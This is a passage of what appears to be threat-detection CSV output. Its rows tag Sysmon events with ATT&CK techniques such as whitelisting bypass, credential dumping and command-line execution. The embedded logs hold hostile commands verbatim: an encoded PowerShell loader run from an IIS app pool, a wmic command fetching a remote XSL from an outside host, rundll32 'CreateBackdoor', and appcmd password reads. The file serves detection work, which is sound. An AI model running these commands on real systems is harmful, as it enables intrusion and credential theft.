UAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4920 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.893 + 747F3D96-6628-5D3F-0000-0010349B8800 + 6552 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 19 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.309 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 19 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.309 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6594 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1059,technique_name=Command-Line Interface + 2019-04-27 15:57:53.806 + 365ABB72-7C01-5CC4-0000-00105C5C0C00 + 3076 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /A + C:\Users\IEUser\AppData\Roaming\ + IEWIN7\IEUser + 365ABB72-7AB1-5CC4-0000-0020BEF40000 + 0xf4be + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7C01-5CC4-0000-0010F9530C00 + 2992 + C:\Users\IEUser\AppData\Roaming\NvSmart.exe + "C:\Users\IEUser\AppData\Roaming\NvSmart.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5925 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.392 + 365ABB72-3D6E-5CEB-0000-00100C96FF00 + 3136 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1025 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 17:45:34.528 + 365ABB72-DC3E-5CE6-0000-00102BC97200 + 712 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-CE6D-5CE6-0000-00109E190100 + 1472 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 896 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 16:49:08.258 + 365ABB72-CF04-5CE6-0000-001010F20C00 + 4056 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + c:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-CF01-5CE6-0000-00105DA50C00 + 3872 + C:\Windows\System32\wbem\WMIC.exe + wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4919 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.756 + 747F3D96-6628-5D3F-0000-0010B1968800 + 5708 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 18 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:12.919 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 18 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:12.919 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5922 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.322 + 365ABB72-3D6E-5CEB-0000-00104C92FF00 + 3100 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 